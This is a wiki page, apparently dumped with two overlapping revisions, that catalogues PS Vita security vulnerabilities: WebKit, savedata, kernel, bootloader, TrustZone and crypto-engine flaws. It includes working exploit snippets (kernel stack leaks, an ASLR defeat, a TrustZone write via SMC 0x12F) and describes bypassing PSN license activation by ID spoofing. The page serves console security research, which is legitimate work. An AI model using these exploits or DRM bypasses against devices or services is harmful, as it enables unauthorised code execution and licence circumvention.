https://yifan.lu/2015/06/21/hacking-the-ps-vita/<br />
<br />
=== PSM Unity privilege escalation ===<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
=== PSM NetworkRequest privilege escalation ===<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Games savedata exploits (h-encore) ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
Exploitable in theory on any firmware (not patchable, or hardly).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games does not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is because games that were developed with an SDK 2.60 and lower were compiled as a statically linked executable, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to an other region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process, you just fuzz gamesaves by writing random stuff at random locations until you get a crash (best bet is extending strings and hope that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Bug implemented by TheFloW in h-encore.<br />
<br />
The bug relies on the parser of the bittersmile game. The gamesave is actually a text file and the game reads it line by line and copies them to a list of buffers. However it doesn't validate the length, thus if we put the delimiter \n far away such that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer is on stack, we can make it overwrite the return address and straightly execute our ROP chain. However it is on the data section, but luckily for us, the content after the buffer is actually the list that contained destinations for other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want and therefore enable us an arbitrary write primitive.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow writeup]<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can securize PSVita's store as much as they want, we will always be able to activate til PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof Firmware version for bypassing FW Update popup and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHENkaku 3.60-3.68. This also means ReStore / ReNpDrm is not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Stack leak using sceIoDevctl from userland applications ===<br />
(tested successfully on firmware 0.995, fixed at least on firmware 1.030, works on later firmware via webkit)<br />
<pre><br />
// let's make a buffer, with 0x66's<br />
char outbuf[0x400];<br />
memset(outbuf, 0x066, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // sceIoOpen to populate kernel stack<br />
<br />
// and now, let's get the stack back and check if our data was actually written there..<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</pre><br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Confirmed exploitable before 1.80. Tested on 1.50 and 1.61.<br />
<br />
Patched on 1.80. They also added an IsShell check.<br />
<br />
=== sceIoDevctl does not clear stack buffer (henkaku kernel exploit) ===<br />
<br />
Discovered on 2014-11-24.<br />
<br />
Only works in webkit, not in fself nor game.<br />
<br />
Call some interesting functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call devctl and get upto 0x3FF bytes of that stack!<br />
<br />
<source lang="c"><br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, WINDOW_BASE+0x10, 0x3FF);<br />
store(RET, WINDOW_BASE+0x4);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
(2015-07-03) A large syscall number passed in R12 can overflow syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
This was patched in 1.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05. Implemented in HENkaku. See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup]<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or just before.<br />
<br />
==== kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here]<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
=== SceNgs design flaws (h-encore kernel exploits) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore 3.65-3.68.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== kstack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xored or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME allows to get the kstack addr faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 //value specific for 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceInt32 ret = 0;<br />
<br />
SceNgsRackDescription rackDesc;<br />
rackDesc.nChannelsPerVoice = 1;<br />
rackDesc.nVoices = 1;<br />
rackDesc.nMaxPatchesPerInput = 0;<br />
rackDesc.nPatchesPerOutput = 1;<br />
<br />
unsigned int voiceDef[0x400];<br />
memset(voiceDef, 0x00, 0x400);<br />
voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
voiceDef[2]= 0x40;<br />
voiceDef[3]= 0x40;<br />
sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
sceKernelDelayThread(2*1000*1000);<br />
<br />
for(unsigned int addr=DEVCTL_STACK_FRAME; addr < 0x3000000; addr+= 0x1000)<br />
{ <br />
rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
gRet = ret;<br />
if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
continue;<br />
else return (addr-DEVCTL_STACK_FRAME); <br />
}<br />
return 0xFFFFFFF;<br />
} <br />
</source><br />
<br />
=== memcpy bugs (h-encore kernel exploit) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The 2 following bugs are exploited when using a negative length memcpy in order to use OOB without having a too big copied buffer nor triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, the addition with dst will yield a value smaller than dst due to an integer overflow and as a consequence, the comparison later in the code will result in false, no matter if it is a signed or unsigned comparison, and thus it believes that there are less than 32 bytes to copy.<br />
<br />
==== memcpy length comparizon as signed integer ====<br />
<br />
At some point in memcpy function, the length is compared as signed integer. Hence a negative length will simply bypass the copy loop.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. We can mod eMMC MBR to change block size. But yifan was trying to exploit it with an adjacent malloc(controlled_size) and couldn't find a way so just left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyx find the way to exploit the buffer overflow. He discovers a logic flaw related to error code propagation in NSBL. A function does not check a error return: if it did then the corrupted value in buffer overflow would not have been used. And later on the field that was written was used in a separate call.<br />
<br />
It so allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
=== SMC 0x12F does not validate arguments -> TrustZone level arbitrary code execution ===<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
(2017-01-01) SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table).<br />
<br />
This results in TrustZone level arbitrary code execution.<br />
<br />
It was patched somewhere around after 1.80 before 2.10.<br />
<br />
A 1.80 TrustZone modules imports/exports list is available [https://pastebin.com/59pe8jBg there].<br />
<br />
Example code exploiting this vulnerability:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1;<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %1\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
);<br />
}<br />
</source><br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) f00d secure_kernel module loading does not check source address and therefore provides an oracle allowing for memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== To be disclosed ===<br />
<br />
(2017-02-23) To be disclosed.<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== moth exploit ===<br />
<br />
(2019-02-05) To be disclosed.<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=10698Vulnerabilities2019-02-06T15:47:25Z<p>Xyz: /* F00D Processor */</p>
<hr />
<div>== Userland ==<br />
<br />
=== Webkit exploits in Email app ===<br />
<br />
Implemented by xyz, in order HENkaku to be launched offline.<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup]<br />
<br />
=== WebKit 531 (Vita FW BEFORE 2.00) ===<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit CVE-2010-1807 on the parseFloat() function using a Nan as the arg.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
=== WebKit 536 (Vita FW 2.00 thru 3.20) (CVE-2012-3748) (2013-09-03-1) ===<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<ref>http://packetstormsecurity.com/files/123088/</ref><br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ===<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains less entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.50-3.60) (unknown or no CVE) ===<br />
<br />
Discovered by xyz. Fixed in 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit simplified code by St4rk]<br />
<br />
=== PSM Mono privilege escalation ===<br />
<br />
https://yifan.lu/2015/06/21/hacking-the-ps-vita/<br />
<br />
=== PSM Unity privilege escalation ===<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
=== PSM NetworkRequest privilege escalation ===<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Games savedata exploits (h-encore) ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
Exploitable in theory on any firmware (not patchable, or hardly).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games does not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is because games that were developed with an SDK 2.60 and lower were compiled as a statically linked executable, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to an other region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process, you just fuzz gamesaves by writing random stuff at random locations until you get a crash (best bet is extending strings and hope that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Bug implemented by TheFloW in h-encore.<br />
<br />
The bug relies on the parser of the bittersmile game. The gamesave is actually a text file and the game reads it line by line and copies them to a list of buffers. However it doesn't validate the length, thus if we put the delimiter \n far away such that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer is on stack, we can make it overwrite the return address and straightly execute our ROP chain. However it is on the data section, but luckily for us, the content after the buffer is actually the list that contained destinations for other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want and therefore enable us an arbitrary write primitive.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow writeup]<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can securize PSVita's store as much as they want, we will always be able to activate til PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof Firmware version for bypassing FW Update popup and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHENkaku 3.60-3.68. This also means ReStore / ReNpDrm is not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Stack leak using sceIoDevctl from userland applications ===<br />
(tested successfully on firmware 0.995, fixed at least on firmware 1.030, works on later firmware via webkit)<br />
<pre><br />
// let's make a buffer, with 0x66's<br />
char outbuf[0x400];<br />
memset(outbuf, 0x066, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // sceIoOpen to populate kernel stack<br />
<br />
// and now, let's get the stack back and check if our data was actually written there..<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</pre><br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Confirmed exploitable before 1.80. Tested on 1.50 and 1.61.<br />
<br />
Patched on 1.80. They also added an IsShell check.<br />
<br />
=== sceIoDevctl does not clear stack buffer (henkaku kernel exploit) ===<br />
<br />
Discovered on 2014-11-24.<br />
<br />
Only works in webkit, not in fself nor game.<br />
<br />
Call some interesting functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call devctl and get upto 0x3FF bytes of that stack!<br />
<br />
<source lang="c"><br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, WINDOW_BASE+0x10, 0x3FF);<br />
store(RET, WINDOW_BASE+0x4);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
(2015-07-03) A large syscall number passed in R12 can overflow syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
This was patched in 1.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05. Implemented in HENkaku. See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup]<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or just before.<br />
<br />
==== kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here]<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
=== SceNgs design flaws (h-encore kernel exploits) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore 3.65-3.68.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== kstack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xored or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME allows to get the kstack addr faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 //value specific for 1.692<br />
<br />
